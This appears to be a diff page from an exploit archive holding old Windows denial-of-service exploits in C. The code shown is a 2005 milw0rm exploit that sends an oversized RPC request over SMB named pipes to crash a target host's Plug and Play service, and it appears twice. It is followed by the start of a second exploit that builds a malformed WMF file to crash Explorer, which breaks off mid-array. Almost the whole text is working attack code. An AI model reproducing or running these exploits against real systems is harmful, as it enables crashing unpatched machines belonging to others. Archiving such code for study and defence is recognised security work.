0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
};
int main(int argc, char* argv[])
{
char szServerName[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
NETRESOURCE nr;
if (argc < 2){
printf("[-] Usage: %s <host>\n", argv[0]);
return -1;
}
if ( strlen(argv[1]) > (MAX_PATH - 50) ) {
printf("[-] Host name %s is too long !\n");
return -1;
}
printf("[+] Start connect host %s ... \n", argv[1]);
wsprintf( szServerName, "\\\\%s\\pipe", argv[1] );
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = szServerName;
nr.lpProvider = NULL;
if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) {
printf("[-] Connect to host %s failed !\n", argv[1]);
return -1;
}
_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == INVALID_HANDLE_VALUE ) {
printf("[-] Open name pipe %s failed !\n", szPipe);
return -1;
}
unsigned char szOutBuffer[0X1000];
unsigned long nBytesRead;
printf("[+] Start bind RPC interface ... \n");
// bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile);
return -1;
}
// send rpc request to call PNP_GetDeviceList (opnum 10)
printf("[+] Start send RPC request ... \n");
if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile);
return -1;
}
printf("[+] Attack host %s complete !\n", argv[1]);
return 0;
}
// milw0rm.com [2005-10-21]
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] =
{
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
unsigned char szRequestString[] =
{
0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
};
int main(int argc, char* argv[])
{
char szServerName[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
NETRESOURCE nr;
if (argc < 2){
printf("[-] Usage: %s <host>\n", argv[0]);
return -1;
}
if ( strlen(argv[1]) > (MAX_PATH - 50) ) {
printf("[-] Host name %s is too long !\n");
return -1;
}
printf("[+] Start connect host %s ... \n", argv[1]);
wsprintf( szServerName, "\\\\%s\\pipe", argv[1] );
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = szServerName;
nr.lpProvider = NULL;
if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) {
printf("[-] Connect to host %s failed !\n", argv[1]);
return -1;
}
_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == INVALID_HANDLE_VALUE ) {
printf("[-] Open name pipe %s failed !\n", szPipe);
return -1;
}
unsigned char szOutBuffer[0X1000];
unsigned long nBytesRead;
printf("[+] Start bind RPC interface ... \n");
// bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile);
return -1;
}
// send rpc request to call PNP_GetDeviceList (opnum 10)
printf("[+] Start send RPC request ... \n");
if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile);
return -1;
}
printf("[+] Attack host %s complete !\n", argv[1]);
return 0;
}
// milw0rm.com [2005-10-21]

222
platforms/windows/dos/1346.c
View file

@ -1,111 +1,111 @@
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include <stdio.h>
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mtType
"\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord
"\x00\x00";
unsigned char metafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
"\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
"\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
"\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
"\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
"\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
"\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
"\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
"\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
"\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
"\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
"\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
"\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
"\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
"\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
"\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
"\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
"\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
"\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
"\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
"\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
